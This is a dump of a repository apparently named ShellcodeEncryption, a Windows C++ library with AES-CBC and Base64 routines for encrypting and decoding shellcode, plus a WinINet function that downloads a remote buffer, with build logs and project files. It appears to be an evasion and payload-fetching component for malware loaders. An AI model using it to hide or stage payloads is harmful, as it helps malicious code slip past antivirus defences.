https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515195113865.png
--------------------------------------------------------------------------------
/README/image-20230515195404012.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515195404012.png
--------------------------------------------------------------------------------
/README/image-20230515201325408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515201325408.png
--------------------------------------------------------------------------------
/README/image-20230515201541815.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515201541815.png
--------------------------------------------------------------------------------
/README/image-20230516154122994.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230516154122994.png
--------------------------------------------------------------------------------
/README/image-20230516154853419.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230516154853419.png
--------------------------------------------------------------------------------
/README/image-20230516155107883.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230516155107883.png
--------------------------------------------------------------------------------
/Shellcode加密库/AES.h:
--------------------------------------------------------------------------------
1 | #ifndef _AES_H
2 | #define _AES_H
3 | #include
4 | #include
5 | #include
6 | #define BLOCK_SIZE 16
7 | using namespace std;
8 |
// Block cipher object used by the library's EncryptionAES/DecryptionAES wrappers.
// A key is installed with MakeKey(), after which Encrypt()/Decrypt() process a
// buffer of n bytes in the mode selected by iMode.
// NOTE(review): the include-guard comment at the end of this header mentions
// __RIJNDAEL_H__, which suggests the class derives from a Rijndael implementation - confirm against AES.cpp.
9 | class AES
10 | {
11 | public:
// Chaining modes accepted by the iMode argument of Encrypt()/Decrypt()
12 | enum
13 | {
14 | ECB = 0, CBC = 1, CFB = 2
15 | };
16 |
17 | private:
// Default size, in bytes, for both key length and block size in MakeKey()
18 | enum
19 | {
20 | DEFAULT_BLOCK_SIZE = 16
21 | };
// Upper bounds used to size the member arrays below
22 | enum
23 | {
24 | MAX_BLOCK_SIZE = 32, MAX_ROUNDS = 14, MAX_KC = 8, MAX_BC = 8
25 | };
26 | public:
27 | AES();
28 | virtual ~AES();
29 | private:
30 | //Key Initialization Flag
31 | bool m_bKeyInit;
32 | //Encryption (m_Ke) round key
33 | int m_Ke[MAX_ROUNDS + 1][MAX_BC];
34 | //Decryption (m_Kd) round key
35 | int m_Kd[MAX_ROUNDS + 1][MAX_BC];
36 | //Key Length
37 | int m_keylength;
38 | //Block Size
39 | int m_blockSize;
40 | //Number of Rounds
41 | int m_iROUNDS;
42 | //Chain Block
43 | char m_chain0[MAX_BLOCK_SIZE];
44 | char m_chain[MAX_BLOCK_SIZE];
45 | //Auxiliary private use buffers
46 | int tk[MAX_KC];
47 | int a[MAX_BC];
48 | int t[MAX_BC];
49 | private:
// Internal block helpers; their definitions are not part of this header
50 | void Xor(char* buff, char const* chain);
51 | void DefEncryptBlock(char const* in, char* result);
52 | void DefDecryptBlock(char const* in, char* result);
53 | void EncryptBlock(char const* in, char* result);
54 | void DecryptBlock(char const* in, char* result);
55 | public:
// Installs the key. The library wrappers in this project pass their IV as `chain`
// and 16 for both keylength and blockSize.
56 | void MakeKey(char const* key, char const* chain, int keylength =
57 | DEFAULT_BLOCK_SIZE, int blockSize = DEFAULT_BLOCK_SIZE);
// Process n bytes from `in` into `result`. iMode defaults to ECB, so a caller that
// wants chaining has to pass CBC or CFB explicitly.
58 | void Encrypt(char const* in, char* result, size_t n, int iMode = ECB);
59 | void Decrypt(char const* in, char* result, size_t n, int iMode = ECB);
60 | };
61 |
62 | #endif // __RIJNDAEL_H__
--------------------------------------------------------------------------------
/Shellcode加密库/Base64.cpp:
--------------------------------------------------------------------------------
1 | #include "base64.h"
2 | #include
3 | #include
// The 64-symbol Base64 alphabet; a symbol's position in the string is its 6-bit value.
static const std::string base64_chars(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");

// Returns true when c is a Base64 data symbol. The '=' padding character is
// not a data symbol and yields false.
static inline bool is_base64(unsigned char c) {
    if (c == '+' || c == '/')
        return true;
    return isalnum(c) != 0;
}
13 |
// Encodes in_len bytes starting at bytes_to_encode as Base64 text.
// Every 3 input bytes become 4 alphabet symbols; a final group of 1 or 2
// bytes is zero-extended, emitted as 2 or 3 symbols and completed with '='
// so the output length is always a multiple of 4.
std::string base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len) {
    std::string encoded;
    unsigned int pos = 0;

    // Complete groups: pack 24 bits, then peel off four 6-bit indices.
    for (; in_len - pos >= 3; pos += 3) {
        const unsigned int bits = (bytes_to_encode[pos] << 16)
                                | (bytes_to_encode[pos + 1] << 8)
                                | bytes_to_encode[pos + 2];
        for (int shift = 18; shift >= 0; shift -= 6)
            encoded += base64_chars[(bits >> shift) & 0x3f];
    }

    // Trailing 1 or 2 bytes: the missing bytes count as zero.
    const unsigned int left = in_len - pos;
    if (left != 0) {
        unsigned int bits = bytes_to_encode[pos] << 16;
        if (left == 2)
            bits |= bytes_to_encode[pos + 1] << 8;

        // left input bytes carry data into left + 1 symbols.
        for (unsigned int k = 0; k <= left; ++k)
            encoded += base64_chars[(bits >> (18 - 6 * k)) & 0x3f];

        encoded.append(3 - left, '=');
    }

    return encoded;
}
56 |
// Decodes Base64 text back to bytes.
// Reading stops at the first '=' or at the first character that is_base64()
// rejects, so anything after such a character (including whitespace or line
// breaks inside the text) is silently ignored rather than reported.
std::string base64_decode(std::string const& encoded_string) {
    std::string decoded;
    unsigned char quad[4], triple[3];
    int held = 0;

    const int total = encoded_string.size();
    for (int pos = 0; pos != total; ++pos) {
        const char symbol = encoded_string[pos];
        if (symbol == '=' || !is_base64(symbol))
            break;

        quad[held++] = symbol;
        if (held != 4)
            continue;

        // A full group: replace each symbol by its 6-bit value, then repack.
        for (int k = 0; k < 4; ++k)
            quad[k] = base64_chars.find(quad[k]);

        triple[0] = (quad[0] << 2) + ((quad[1] & 0x30) >> 4);
        triple[1] = ((quad[1] & 0xf) << 4) + ((quad[2] & 0x3c) >> 2);
        triple[2] = ((quad[2] & 0x3) << 6) + quad[3];

        decoded.append(reinterpret_cast<const char*>(triple), 3);
        held = 0;
    }

    if (held != 0) {
        // Partial group: pad the unused slots, map all four, keep held - 1 bytes.
        for (int k = held; k < 4; ++k)
            quad[k] = 0;
        for (int k = 0; k < 4; ++k)
            quad[k] = base64_chars.find(quad[k]);

        triple[0] = (quad[0] << 2) + ((quad[1] & 0x30) >> 4);
        triple[1] = ((quad[1] & 0xf) << 4) + ((quad[2] & 0x3c) >> 2);
        triple[2] = ((quad[2] & 0x3) << 6) + quad[3];

        decoded.append(reinterpret_cast<const char*>(triple), held - 1);
    }

    return decoded;
}
--------------------------------------------------------------------------------
/Shellcode加密库/Base64.h:
--------------------------------------------------------------------------------
1 | #ifndef BASE_64_H
2 | #define BASE_64_H
3 | #include
4 | std::string base64_encode(unsigned char const*, unsigned int len);
5 | std::string base64_decode(std::string const& s);
6 | #endif
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.cpp:
--------------------------------------------------------------------------------
1 | // Shellcode加密库.cpp : 定义静态库的函数。
2 | #include "Shellcode加密库.h"
3 | #define BUF_SIZE 4096
4 |
5 | using namespace std;
6 |
// Encrypts strSrc with AES in CBC mode and returns the ciphertext as Base64 text.
//   strSrc - plaintext; it is copied with strcpy, so only the bytes before its
//            first NUL are carried over and the remainder of the buffer stays zero.
//   g_key  - key material; MakeKey is told to use 16 bytes of it.
//   g_iv   - handed to MakeKey as the initial chain value (the CBC IV).
// PKCS#7 padding is always appended, so the ciphertext is
// (length / BLOCK_SIZE + 1) blocks long even for block-aligned input.
string EncryptionAES(const string& strSrc, const char* g_key, const char* g_iv) {
    const size_t srcLen = strSrc.length();
    const int blockCount = srcLen / BLOCK_SIZE + 1;
    const int paddedLen = blockCount * BLOCK_SIZE;

    // Plaintext buffer, zero-initialised, with one spare byte for a terminator.
    char* plain = new char[paddedLen + 1]();
    strcpy(plain, strSrc.c_str());

    // PKCS#7: the tail is N copies of the byte N, where N is the room left in
    // the last block (a whole block when the input is already aligned).
    const int padLen = BLOCK_SIZE - static_cast<int>(srcLen % BLOCK_SIZE);
    memset(plain + srcLen, padLen, padLen);
    plain[paddedLen] = '\0';

    // Ciphertext buffer of the same size.
    char* cipher = new char[paddedLen + 1]();

    // 16-byte key and 16-byte block, CBC chaining.
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Encrypt(plain, cipher, paddedLen, AES::CBC);

    string encoded = base64_encode(reinterpret_cast<unsigned char*>(cipher), paddedLen);

    delete[] plain;
    delete[] cipher;
    return encoded;
}
39 |
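// Base64-decodes strSrc, decrypts it with AES in CBC mode and strips the
// PKCS#7 padding.
//   strSrc - Base64 text as produced by EncryptionAES.
//   g_key  - key material; MakeKey is told to use 16 bytes of it.
//   g_iv   - handed to MakeKey as the initial chain value (the CBC IV).
// Returns the plaintext up to its first NUL byte. An empty string is returned
// when the input decodes to nothing or when the padding bytes are inconsistent
// (in which case a message is also written to stdout).
// NOTE(review): nothing here authenticates the ciphertext, so the padding
// check is the only sign that key, IV and data belong together.
string DecryptionAES(const string& strSrc, const char* g_key, const char* g_iv) {
    string strData = base64_decode(strSrc);
    size_t length = strData.length();

    // Nothing to decrypt; also keeps szDataOut[length - 1] below in bounds.
    if (length == 0)
        return string();

    // Ciphertext
    char* szDataIn = new char[length + 1];
    memcpy(szDataIn, strData.c_str(), length + 1);
    // Plaintext; the copy leaves a terminating NUL at index `length`
    char* szDataOut = new char[length + 1];
    memcpy(szDataOut, strData.c_str(), length + 1);

    // AES decryption in CBC mode
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);

    // Remove PKCS#7 padding. The last byte is read as unsigned and must name a
    // count between 1 and BLOCK_SIZE that also fits inside the buffer; any
    // other value is left in place, as the original range test intended.
    const size_t pad = static_cast<unsigned char>(szDataOut[length - 1]);
    if (pad >= 1 && pad <= static_cast<size_t>(BLOCK_SIZE) && pad <= length)
    {
        bool paddingOk = true;
        // Unsigned forward scan: the index can never step below the buffer start.
        for (size_t i = length - pad; i < length; i++)
        {
            if (static_cast<unsigned char>(szDataOut[i]) != pad)
            {
                paddingOk = false;
                break;
            }
        }

        if (paddingOk)
        {
            memset(szDataOut + (length - pad), 0, pad);
        }
        else
        {
            // Inconsistent padding: wipe the output so no partial data leaks out.
            memset(szDataOut, 0, length);
            cout << "去填充失败!解密出错!!" << endl;
        }
    }

    string strDest(szDataOut);
    delete[] szDataIn;
    delete[] szDataOut;
    return strDest;
}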
76 |
// Builds a string of `length` characters drawn from digits, ASCII letters and
// a set of punctuation marks, one rand() call per character.
// NOTE(review): rand() is not a cryptographic generator. The README example
// seeds it with srand(time(0)), so a value produced this way can be
// regenerated by anyone who knows or can guess the start time.
std::string random_string(size_t length)
{
    static const char kCharset[] =
        "0123456789"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz"
        "!@#$%^&*()_+=-[]{};:,.<>/?|";
    // sizeof counts the terminating NUL, which must never be selected.
    const size_t kChoices = sizeof(kCharset) - 1;

    std::string out;
    out.reserve(length);
    for (size_t n = 0; n < length; ++n)
        out.push_back(kCharset[rand() % kChoices]);
    return out;
}
93 |
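// Renders len bytes starting at data as lowercase hexadecimal text, two
// digits per byte with no separators (e.g. {0x00, 0xfc} -> "00fc").
// The cast's target type was missing in the listing; each byte is widened to
// int so the stream prints its numeric value rather than a raw character.
std::string toHexString(unsigned char* data, size_t len)
{
    std::ostringstream oss;
    // hex and the fill character persist on the stream; the width does not,
    // so setw(2) is applied again for every byte.
    oss << std::hex << std::setfill('0');
    for (size_t i = 0; i < len; ++i)
        oss << std::setw(2) << static_cast<int>(data[i]);
    return oss.str();
}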
101 |
// Opens lpcInterNetURL through WinINet, performs a single InternetReadFile of up
// to BUF_SIZE bytes and copies the local buffer into buff.
//   lpcInterNetURL - URL handed to InternetOpenUrlA.
//   buff           - destination; BUF_SIZE bytes are always copied on a successful
//                    read, whatever dwBytesRead reports, so it must hold at least BUF_SIZE bytes.
// Returns a null pointer on every visible path: `return 0` after a successful read,
// and lpResult, which is never reassigned, otherwise. The return value therefore
// does not tell the caller whether buff was filled.
102 | LPSTR GetInterNetURLText(LPSTR lpcInterNetURL, unsigned char* buff)
103 | {
104 | HINTERNET hSession;
105 | LPSTR lpResult = NULL;
106 | // Changed "WinInet" to _T("WinInet") here
// The first InternetOpen argument is the agent string, so requests made through
// this session carry the fixed User-Agent "WinInet"; that constant is a usable network indicator.
107 | hSession = InternetOpen(_T("WinInet"), INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
108 | __try
109 | {
110 | if (hSession != NULL)
111 | {
112 | HINTERNET hRequest;
// INTERNET_FLAG_RELOAD requests a download from the origin server instead of the cache
113 | hRequest = InternetOpenUrlA(hSession, lpcInterNetURL, NULL, 0, INTERNET_FLAG_RELOAD, 0);
114 | __try
115 | {
116 | if (hRequest != NULL)
117 | {
118 | DWORD dwBytesRead;
119 | char szBuffer[BUF_SIZE] = { 0 };
120 |
// One read only: content beyond BUF_SIZE bytes is never fetched
121 | if (InternetReadFile(hRequest, szBuffer, BUF_SIZE, &dwBytesRead))
122 | {
123 | RtlMoveMemory(buff, szBuffer, BUF_SIZE);
// Leaves from inside both __try blocks; the two __finally handlers still run
124 | return 0;
125 | }
126 | }
127 | }
128 | __finally
129 | {
// Runs even when InternetOpenUrlA returned NULL
130 | InternetCloseHandle(hRequest);
131 | }
132 | }
133 | }
134 | __finally
135 | {
// Runs even when InternetOpen returned NULL
136 | InternetCloseHandle(hSession);
137 | }
138 | return lpResult;
139 | }
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/Shellcode加密库.h
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {b4dc16ff-79c8-4c66-be29-8528b628b876}
25 | Shellcode加密库
26 | 10.0
27 |
28 |
29 |
30 | StaticLibrary
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | StaticLibrary
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | StaticLibrary
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | StaticLibrary
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)
78 | true
79 | Use
80 | pch.h
81 |
82 |
83 |
84 |
85 | true
86 |
87 |
88 |
89 |
90 | Level3
91 | true
92 | true
93 | true
94 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)
95 | true
96 | Use
97 | pch.h
98 |
99 |
100 |
101 |
102 | true
103 | true
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | false
111 | _DEBUG;_LIB;%(PreprocessorDefinitions)
112 | true
113 | NotUsing
114 | pch.h
115 | false
116 |
117 |
118 |
119 |
120 | true
121 |
122 |
123 |
124 |
125 | Level3
126 | true
127 | true
128 | false
129 | NDEBUG;_LIB;%(PreprocessorDefinitions)
130 | true
131 | NotUsing
132 | pch.h
133 | false
134 |
135 |
136 |
137 |
138 | true
139 | true
140 | true
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 | 源文件
23 |
24 |
25 | 源文件
26 |
27 |
28 |
29 |
30 | 头文件
31 |
32 |
33 | 头文件
34 |
35 |
36 | 头文件
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Shellcode加密库/Shellcode加密库.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/AES.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/AES.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Base64.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\x64\debug\shellcode加密库.pdb
2 | e:\source code\c_code\shellcode加密\x64\debug\shellcode加密库.idb
3 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.obj
4 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\base64.obj
5 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\aes.obj
6 | e:\source code\c_code\shellcode加密\x64\debug\shellcode加密库.lib
7 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\cl.command.1.tlog
8 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\cl.read.1.tlog
9 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\cl.write.1.tlog
10 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\lib-link.read.1.tlog
11 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\lib-link.write.1.tlog
12 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\debug\shellcode加密库.tlog\lib.command.1.tlog
13 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.lib.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.log:
--------------------------------------------------------------------------------
1 | AES.cpp
2 | Base64.cpp
3 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Base64.cpp(58,36): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
4 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Base64.cpp(69,57): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
5 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Base64.cpp(86,56): warning C4267: “=”: 从“size_t”转换到“unsigned char”,可能丢失数据
6 | Shellcode加密库.cpp
7 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(9,41): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
8 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(17,29): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
9 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(13,2): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
10 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(56,11): warning C4804: “<=”: 在操作中使用类型“bool”不安全
11 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(59,3): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
12 | 正在生成代码...
13 | Shellcode加密库.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\Shellcode加密库.lib
14 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\Shellcode加密库.lib" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\Shellcode加密库.tlog\Shellcode加密库.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
15 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib-link.write.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Lib.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.tlog/Shellcode加密库.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Debug/Shellcode加密库.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Debug/Shellcode加密库.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/AES.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/AES.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Base64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Base64.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\x64\release\shellcode加密库.pdb
2 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.obj
3 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\base64.obj
4 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\aes.obj
5 | e:\source code\c_code\shellcode加密\x64\release\shellcode加密库.lib
6 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\cl.command.1.tlog
7 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\cl.read.1.tlog
8 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\cl.write.1.tlog
9 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\lib-link.read.1.tlog
10 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\lib-link.write.1.tlog
11 | e:\source code\c_code\shellcode加密\shellcode加密库\x64\release\shellcode加密库.tlog\lib.command.1.tlog
12 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.lib.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.log:
--------------------------------------------------------------------------------
1 | Shellcode加密库.cpp
2 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(9,41): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
3 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(13,2): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
4 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(17,29): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
5 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(56,11): warning C4804: “<=”: 在操作中使用类型“bool”不安全
6 | E:\Source Code\C_code\shellcode加密\Shellcode加密库\Shellcode加密库.cpp(59,3): warning C4267: “初始化”: 从“size_t”转换到“int”,可能丢失数据
7 | Shellcode加密库.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Release\Shellcode加密库.lib
8 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Release\Shellcode加密库.lib" "E:\vcpkg\installed\x64-windows\bin" "x64\Release\Shellcode加密库.tlog\Shellcode加密库.write.1u.tlog" "x64\Release\vcpkg.applocal.log"
9 |
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.obj
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/Shellcode加密库/x64/Release/Shellcode加密库.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
